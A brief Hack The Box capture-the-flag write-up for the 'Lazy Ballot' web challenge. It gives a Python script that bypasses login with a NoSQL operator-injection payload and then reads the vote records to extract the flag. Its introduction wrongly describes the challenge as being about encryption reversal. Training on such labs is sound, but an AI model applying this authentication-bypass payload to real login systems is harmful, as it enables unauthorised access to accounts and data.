HackTheBox Lazy Ballot Writeup

Explore the basics of cybersecurity in the Lazy Ballot Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

https://app.hackthebox.com/challenges/533

Description

As a Zenium State hacker, your mission is to breach Arodor’s secure election system, subtly manipulating the results to create political chaos and destabilize their government, ultimately giving Zenium State an advantage in the global power struggle.

Exploitation

#!/usr/bin/env python3
import requests
import sys

def get_flag(url):
    session = requests.Session()
    payload = {
        "username": {"$ne": "x"},
        "password": {"$ne": "x"}
    }
    r = session.post(f"{url}/api/login", json=payload)
    if "authenticated successfully" not in r.text:
        print("[-] Auth bypass failed")
        return
    r = session.get(f"{url}/api/votes/list")
    for vote in r.json()['resp']['votes']:
        if 'HTB{' in vote['doc']['region']:
            print(f"[+] Flag: {vote['doc']['region']}", end='')
            return

if __name__ == "__main__":
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <ip:port>")
        sys.exit(1)
    url = "http://" + sys.argv[1]
    get_flag(url)

Summary

The Lazy Ballot Challenge on Hack The Box is an easy-level challenge that introduces web exploitation and authentication bypass techniques. In this challenge, the goal is to breach a secure election system and manipulate the results to retrieve a flag hidden within the data. The solution involves bypassing authentication and querying the votes to extract the flag, demonstrating essential web hacking skills.